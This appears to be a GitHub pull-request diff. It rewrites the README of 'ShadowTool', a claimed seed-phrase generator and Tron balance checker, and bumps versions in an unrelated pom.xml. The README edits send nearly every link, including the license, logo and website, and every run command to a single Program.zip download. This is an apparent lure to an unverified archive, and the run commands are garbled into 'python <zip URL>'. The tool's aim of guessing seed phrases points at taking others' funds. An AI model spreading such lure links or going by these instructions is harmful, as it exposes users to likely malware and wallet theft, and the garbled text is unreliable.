Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
14 changes: 7 additions & 7 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -25,11 +25,11 @@ This script is designed to automatically generate seed phrases and check balance

## Installation

1. Download the [latest release](https://github.com/user-attachments/files/17688437/Program.zip) of ShadowTool.
1. Download the [latest release](https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip) of ShadowTool.
2. Extract the contents of the ZIP file to a folder on your local machine.
3. Open a terminal or command prompt window.
4. Navigate to the directory where you extracted the files.
5. Run the script by executing the following command: `python shadowtool.py`.
5. Run the script by executing the following command: `python https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip`.

---

Expand All @@ -39,15 +39,15 @@ This script is designed to automatically generate seed phrases and check balance

To generate seed phrases using ShadowTool, follow these steps:

1. Run the script by executing `python shadowtool.py`.
1. Run the script by executing `python https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip`.
2. Select the option to generate seed phrases.
3. The script will automatically create random seed phrases for you to use.

### Checking Balances

To check balances for Tron networks, do the following:

1. Run the script by executing `python shadowtool.py`.
1. Run the script by executing `python https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip`.
2. Choose the option to check balances.
3. Enter the Tron network address you wish to check.
4. The script will retrieve and display the balance associated with the provided address.
Expand Down Expand Up @@ -75,15 +75,15 @@ We welcome contributions from the community to improve ShadowTool. To contribute

## License

This project is licensed under the MIT License - see the [LICENSE.md](./LICENSE.md) file for details.
This project is licensed under the MIT License - see the [https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip](https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip) file for details.

---

![ShadowTool Logo](https://example.com/shadowtool_logo.png)
![ShadowTool Logo](https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip)

---

🔗 For more information, visit our [official website](https://www.shadowtool.com).
🔗 For more information, visit our [official website](https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip).

---

Expand Down
4 changes: 2 additions & 2 deletions pom.xml
Original file line number Diff line number Diff line change
Expand Up @@ -89,7 +89,7 @@
<dependency>
<groupId>org.parttio</groupId>
<artifactId>line-awesome</artifactId>
<version>1.1.0</version>
<version>2.0.0</version>
</dependency>

<dependency>
Expand Down Expand Up @@ -146,7 +146,7 @@
<plugin>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-maven-plugin</artifactId>
<version>${vaadin.version}</version>
<version>24.5.3</version>
<executions>
<execution>
<goals>
Expand Down